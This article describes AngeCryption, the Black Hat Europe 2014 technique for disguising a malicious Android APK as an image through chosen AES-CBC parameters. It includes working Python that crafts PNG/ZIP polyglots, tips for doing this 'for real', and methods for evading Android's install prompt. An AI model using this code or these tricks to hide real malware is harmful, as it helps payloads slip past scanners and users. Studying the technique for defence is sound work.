One of the interesting topics presented at the Black Hat Europe 2014 conference, held in Amsterdam, The Netherlands, on 14 to 17 October 2014, was how an Android package (APK) can be hidden inside an innocuous file such as an image, so that it gets past users and scanners, with only a few restrictions on the file formats involved.
The idea was presented by Axelle Apvrille, Senior Antivirus Analyst and Researcher at Fortinet, a network security company, and Ange Albertini, a reverse engineer and author of Corkami. Albertini developed a technique called AngeCryption which picks an encryption key and initialization vector such that encrypting a valid input file produces a valid output file of a different format; in this case the output is an APK carrying malware. The technique is implemented as a Python script which is available for download on Google Code.
How does AngeCryption work?
The two researchers apply AES (Advanced Encryption Standard) in CBC (Cipher Block Chaining) mode, with a specific key and initialization vector (IV), to an input file so that the ciphertext is itself a desired output file. In CBC mode the first ciphertext block is determined by the IV, so the IV can be chosen to make that block any 16 bytes the attacker wants, and every later ciphertext block can be forced to a chosen value by appending a suitably computed plaintext block to the input. The only requirements on the two file formats are that the input format tolerates data appended to it and the output format tolerates a region of junk (the uncontrolled ciphertext blocks in the middle). During the demonstration at the Black Hat conference they used a PNG image of the Star Wars character Anakin Skywalker as the input file; encrypted with the AngeCryption-chosen key and IV, it became a valid Android application that shows Darth Vader and carries the malicious payload. The whole idea is presented in the two researchers' proof-of-concept application released after the conference; they showed it working on the current Android releases, so users of those versions are exposed to the attack.
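The CBC construction described above, as an added worked example that is not the researchers' script: the chaining equations are what make the trick work, so a small keyed Feistel block cipher (an assumption, chosen so the example runs with the standard library alone) stands in for AES-128, and the same code runs unchanged with a real single-block AES encrypt and decrypt in its place. `hide_png_in_zip` follows the article's direction (image in, APK out), where a ZIP reader locates everything from the End of Central Directory record at the end, so only the tail of the output has to be pinned; `hide_zip_in_png` shows the opposite direction, where the IV pins the 16-byte PNG signature plus a dummy chunk header whose length field swallows the junk. The sample PNG and ZIP are constructed inline; the chunk type `juNK` and all function names are my own.

```python
# Added example, not the researchers' script: AngeCryption-style CBC crafting.
# A toy Feistel block cipher (assumption) stands in for AES-128; the CBC arithmetic
# is identical, so enc_block/dec_block can be swapped for real single-block AES.
import hashlib
import io
import struct
import zipfile
import zlib

BLOCK = 16
PNG_SIG = b"\x89PNG\r\n\x1a\n"

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    # Keyed round function: SHA-256(key || round || half) truncated to 8 bytes.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def enc_block(key: bytes, block: bytes) -> bytes:
    # 4-round Feistel network on one 16-byte block.
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _round(key, rnd, r))
    return l + r

def dec_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _round(key, rnd, l)), l
    return l + r

def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    # Plain CBC, no padding; len(data) must be a multiple of BLOCK.
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = enc_block(key, xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def angecrypt(key: bytes, source: bytes, first_block: bytes, tail: bytes):
    """Return (iv, extended_source) with cbc_encrypt(key, iv, extended_source) ==
    first_block + <junk> + tail. Source must tolerate appended data; target must skip the junk."""
    source += b"\0" * (-len(source) % BLOCK)
    # C1 = E(P1 ^ IV)  =>  IV = D(C1) ^ P1 pins the output's first block.
    iv = xor(dec_block(key, first_block), source[:BLOCK])
    junk = cbc_encrypt(key, iv, source)           # blocks 2..n are uncontrolled junk
    # C_i = E(P_i ^ C_{i-1})  =>  P_i = D(C_i) ^ C_{i-1} pins each tail block.
    prev, extra = junk[-BLOCK:], []
    for i in range(0, len(tail), BLOCK):
        ct = tail[i:i + BLOCK]
        extra.append(xor(dec_block(key, ct), prev))
        prev = ct
    return iv, source + b"".join(extra)

def png_chunk(ctype: bytes, data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))

def tiny_png_body() -> bytes:
    # IHDR + IDAT + IEND of a 1x1 8-bit grayscale image (constructed sample).
    ihdr = png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    return ihdr + png_chunk(b"IDAT", zlib.compress(b"\x00\x7f")) + png_chunk(b"IEND", b"")

def png_chunk_types(data: bytes) -> list:
    # Walk chunks the way a lenient decoder does: CRCs unchecked, stop at IEND.
    if data[:8] != PNG_SIG:
        return []
    pos, types = 8, []
    while pos + 8 <= len(data) and b"IEND" not in types:
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        types.append(ctype)
        pos += 12 + length
    return types

def make_zip(name: str, content: bytes) -> bytes:
    # One-entry ZIP standing in for the APK (constructed sample).
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, content)
    return buf.getvalue()

def zip_entry(data: bytes, name: str) -> bytes:
    # Python's zipfile, like most ZIP readers, tolerates leading and trailing junk.
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)

def hide_zip_in_png(key: bytes, zip_bytes: bytes):
    """APK in, PNG out: signature + dummy chunk header is exactly one block, and
    the dummy chunk's length field swallows the junk blocks that follow."""
    n_blocks = -(-len(zip_bytes) // BLOCK)
    junk_len = (n_blocks - 1) * BLOCK - 4         # chunk data + 4-byte CRC = blocks 2..n
    first = PNG_SIG + struct.pack(">I", junk_len) + b"juNK"   # ancillary, private chunk
    body = tiny_png_body()
    tail = body + b"\0" * (-len(body) % BLOCK)    # anything after IEND is ignored
    iv, src = angecrypt(key, zip_bytes, first, tail)
    return iv, src, cbc_encrypt(key, iv, src)

def hide_png_in_zip(key: bytes, png_bytes: bytes, zip_bytes: bytes):
    # PNG in, APK out (the article's direction): ZIP readers work back from the EOCD
    # record at the end, so leading junk is ignored and only the tail is pinned.
    tail = b"\0" * (-len(zip_bytes) % BLOCK) + zip_bytes   # align in front, keep EOCD last
    iv, src = angecrypt(key, png_bytes, b"\0" * BLOCK, tail)
    return iv, src, cbc_encrypt(key, iv, src)
```

Two caveats worth knowing when doing this for real. The dummy `juNK` chunk carries a wrong CRC, which is why it is declared ancillary (lowercase first letter): decoders such as libpng only warn about a bad CRC on an ancillary chunk and fail on a critical one. And real AES-CBC with PKCS#7 padding always emits one extra ciphertext block for the padding, which is uncontrolled junk after the pinned tail; that is harmless after a PNG's IEND but lands after a ZIP's End of Central Directory record, which is the trailing-data problem discussed in the next section.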
The DexClassLoader Method
For the output APK to be accepted by Android, and for the whole thing to go unnoticed by the user, some data also needs to be fixed up at the end of the encrypted output file. During their demonstration in Amsterdam, Apvrille and Albertini showed that when the wrapper application tries to install the resulting APK on a device, Android displays a permission request to the user. They also came up with a way to avoid this. A ZIP archive, and therefore an APK, ends with a record called the End of Central Directory (EOCD); the encryption step leaves trailing bytes after it, and appending a second EOCD marker after the original one misleads Android into accepting the file as valid. The installation prompt is then sidestepped by not installing the APK at all: the wrapper app loads the classes of the generated APK at run time through Android's DexClassLoader, so the payload runs inside the wrapper's own process with the wrapper's permissions, and no installation dialog appears.
The Android security team has been warned about the technique and is working on a fix. Although operating-system updates are much more secure these days than two or three years ago, the proof of concept works on the system's newest version, Android 4.4.2, and Albertini expects many users to remain vulnerable to it for the next couple of years.